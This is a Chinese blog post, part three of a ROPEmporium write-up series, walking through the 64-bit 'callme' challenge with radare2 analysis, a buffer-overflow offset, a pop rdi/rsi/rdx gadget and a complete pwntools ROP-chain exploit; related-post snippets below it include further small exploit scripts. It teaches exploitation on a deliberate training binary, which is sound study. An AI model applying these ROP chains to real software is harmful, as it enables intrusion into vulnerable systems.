ROPEmporium通关全解(三)

最新推荐文章于 2022-04-21 16:45:26 发布
最新推荐文章于 2022-04-21 16:45:26 发布
阅读量393 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yalecaltech/article/details/103679499
版权

前言
1.关于ROP
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)
ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。
2. 本系列rop实战题目的背景
来自ROPEmporium
旨在通过解决一系列挑战来一步步进阶学习ROP利用技术。

操作
来到第三关
首先看一下二进制文件的信息
在这里插入图片描述
可以看到nx为true,同样设置了栈不可执行
接下来在r2中加载分析
在这里插入图片描述
afl列出函数
在这里插入图片描述在上图中看到了此前出现过的main,pwnem,usefulFunction,不过这里比较有意思的是还出现了callme_one,callme_two,callme_three
我们看看题目的描述
在这里插入图片描述我们知道需要通过对应的顺序传入对应的参数才能得到flag
即:
callme_one(1,2,3),callme_two(1,2,3),callme_three(1,2,3)
每个函数都有三个参数
在进一步分析他们之前,我们先来看看main
在这里插入图片描述在上图中可以看到还是调用了pwnme
我们跟着分析pwnme,看看buffer的大小是否还是一样
在这里插入图片描述
可以看到缓冲区大小还是32字节,fgets函数容易造成缓冲区溢出
再看看usefulFunction中有什么
在这里插入图片描述从上图中可以看到是按照给出的参数、顺序来调用callme_1,2,3三个函数的
所以我们在写的exp时的依据就是这个
需要注意的是,传参时顺序是相反的
我们可以在这个网站(https://godbolt.org/)自己写一段简单的函数并且在main中调用,对照汇编分析
在这里插入图片描述为了将值放入用于传递参数的寄存器中,我们还要用到rop gadget,用于将值从栈pop到这些寄存器中
在这里插入图片描述在这儿找到一条符合条件的
在这里插入图片描述在0x401ab0,这个gadget可以将值从栈上pop到对应的三个寄存器上
这部分的exp比较长,我们直接用pwntools写,关键是四个地址,一个是rop gadget,已经知道了,另外三个是callme_1,2,3的地址,分别如下
在这里插入图片描述完整代码在3.py

from pwn import *

def add_arguments(payload):
    payload += p64(0x0000000000401ab0) # Address of gadget pop rdi; pop rsi; pop rdx; ret;
    payload += p64(0x1)
    payload += p64(0x2)
    payload += p64(0x3)
    return payload

offset = cyclic(40) # 40 bytes used to overflow.
payload = offset
payload = add_arguments(payload)
payload += p64(0x00401850) # Address of callme_one function.
payload = add_arguments(payload)
payload += p64(0x00401870) # Address of callme_two function.
payload = add_arguments(payload)
payload += p64(0x00401810) # Address of callme_three function.

sh = process('callme')
sh.recv()
sh.sendline(payload)
output = sh.recvall()
print(output)

运行结果如下
在这里插入图片描述

拿到了flag。


题目来自ROPEmporium,另参考如下资源:

https://medium.com/@int0x33/
https://paper.seebug.org/272/
https://www.rootnetsec.com/
https://bestwing.me/ropemporium-all-writeup.html
https://firmianay.github.io/2017/11/02/rop_emporium.html
https://www.oipapio.com/cn/article-5389490
http://ascii.911cha.com/
https://www.bejson.com/convert/ox2str/
https://larry.ngrep.me/2018/06/14/rop-emporium-write-up/
https://www.voidsecurity.in/2013/07/some-gadget-sequence-for-x8664-rop.html
https://www.blackhat.com/docs/asia-18/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR.pdf
https://www.blackhat.com/docs/asia-18/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR-wp.pdf
https://www.jianshu.com/p/a9ad38ad33e5
https://zhuanlan.zhihu.com/p/27339191
https://www.voidsecurity.in/2013/07/some-gadget-sequence-for-x8664-rop.html

Elwood Ying
关注
小白详解rop emporium
BadRer的博客
08-02 2109
小白详解rop emporium 前言 rop emporium网站上提供了许多构造rop的challenge,作为小白的我从这里开始,专注于rop链的构造。 ps:写完放了好久结果没投出去,我好菜啊-。- 题目 0x0 ret2win32 IDA打开,很容易找到溢出点 char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28 m...
ropemporium新通关脚本
pondzhang的专栏
09-27 272
1)ret2win32 from pwn import * catflag = 0x0804862C p = process('./ret2win32') payload = 'A'*0x28 + p32(0) + p32(catflag) p.recvuntil('> ') p.send(payload) p.interactive() 2)ret2win from pwn import * catflag = 0x0000000000400756 p = process('./ret2win'
ROP_Emporium_callme
Starr
03-24 1234
文章目录1. split32信息收集黑盒测试反汇编调试分析Exp2. split参考文章 1. split32 信息收集 这个题提供了以下文件: callme32可执行程序 libcallme32.so动态库 key1.dat,key2.dat encrypted_flag.dat 不知道callme32格式那里不对,checksec会报错NameError: name 'dt_rpath' is not defined。一会黑盒测试如果崩溃了就说明有canary,而pie可以从入口点判断: $ rea
rop emporium call me (x64)
u014377094的博客
02-10 1433
这道题惊喜点在于.so文件也可以拖到ida里逆向,服! 下面是题解过程: 左边发现奇怪的callme-one,two,three. 但是人家动态链接了,不知道内容是什么就无法利用,使用ida,把so文件拽里面 告诉我们,按这个参数就correctly了。 下面反倒过程平平无奇了 使用ROPgadget 找到个参数的pop rdi rsi rdx ret 注意:当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。用栈时右到左,但6.
ROP Emporium-callme
网安星空
01-06 442
ROP Emporium网站CTF相关PWN靶场callme,主要是PWN栈溢出中ROP技巧的练习
ROP Emporium ALL Challenge
Pwnpanda的博客
07-18 983
暑假刷题计划-0x00 水平有限,这些只是前面大部分题目的WP,最后几道题暂时没做 题目来源:ROP Emporium 工具&&环境:IDA Pro、gdb+peda、ROPgadget、radare2、Ubuntu 16 ROP: 一步一步学ROP之linux_x86篇 一步一步学ROP之linux_x64篇 友情链接: 大佬博客:https://firmian...
自考00600《高级英语》通关部曲
01-20
高级英语通关部曲第一部同义词辨析arguedebatev.都有争论辩论的意思argue暗示引证理由或证据来支持自己的观点主张或看法debate意思为正式辩论通常指在对立的两派或持有对立看法的人们之间
韩国通关号免费查询系统,韩国清关码校验
09-26
今天给大家带来的是韩国通关码反查纠错系统于2022年9月26日的升级内容介绍。 第一,系统以浏览器插件的形式呈现,后期将会一同发布网站系统。 第二,系统再次启用了批量通关码信息校验的功能,我们的老用户可能并...
高项32小时通关.pdf
06-24
知识点:备考策略和技巧 - 高效的复习方法和时间管理 - 理论学习与实战案例分析的结合 - 重点知识点的梳理和记忆技巧 - 考前模拟题和历年真题的练习 知识点四:项目管理实践中的关键技能 - 项目启动、规划、执行...
WebGoat通关详解.zip
最新发布
03-22
"WebGoat通关详解.zip"这个压缩包文件很可能包含了一步步指导用户如何完成WebGoat所有挑战的详细教程。 在描述中提到的"webgoat通关"意味着这个资源将带领用户了解如何解决WebGoat中的各种安全问题,从基础到高级,...
系统架构设计师考试32小时通关.pdf
05-29
系统架构设计师考试32小时通关.pdf。该书2018年出版,作者:薛大龙,李海龙,吴芳茜,邹月平,黄俊玲 著。51CTO学院的书。考系统架构设计师的可以拿去参考
ROP_Emporium_ret2win
Starr
03-23 654
文章目录1. ret2win32信息收集反汇编Exp2. ret2win反汇编Exp 题目下载地址:ROP Emporium 1. ret2win32 信息收集 $ file ret2win32 ret2win32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e1
ROP Emporium 挑战 WP
hl1293348082的专栏
03-30 156
ROP Emporium 挑战是用来学习 ROP 技术的一系列挑战,本文就对于其中涉及的所有挑战记录一下 wirte up。 下载地址: https://ropemporium.com/ 虽然说简单,但是后面 badchar 后面的 rop 还是学到了不少东西的~ 程序默认开启 nx CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : disabled RELRO : Partia...
适合初学者的ROP攻击入门教程 - [Pwn] ROP Emporium Guide
HiTaQini
06-08 3136
ROP Emporium 是一个ROP攻击入门教学网站,提供了一系列的挑战任务,这些挑战对逆向工程或debug的要求不高,因此对初学者十分友好,适合初学者了解ROP攻击。网站中共有8个挑战任务,每个挑战都引入了一个新概念/知识点,其复杂性和难度逐渐增加,循序渐进,而且每个挑战都有32/64位两个版本的程序,适合初学者了解二者之间的差异。
64位函数参数传递方式
热门推荐
qq_35467337的博客
03-08 1万+
64位函数传参方式
ROP Emporium x86_64 7~8题
CoLin的pwn小屋
04-21 389
ROP Emporium x64 7-8题
ROP Emporium x86_64 1~6题
CoLin的pwn小屋
04-09 3287
ROP Emporium x64 1-6题
ROPEmporium通关全解(一)
Yale的博客
12-24 1053
前言 关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 本系列rop实战题目的背景 来自ROPEmporium 旨在通...
ROPEmporium通关全解(五)
Yale的博客
12-24 352
前言 1.关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 2. 本系列rop实战题目的背景 来自ROPEmporium...
upload-labs通关
07-29
通过以上步骤,你可以成功通关upload-labs的第关。 #### 引用[.reference_title] - *1* *3* [文件上传及upload-labs闯关](https://blog.csdn.net/anananan145/article/details/125787236)[target="_blank" data-...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值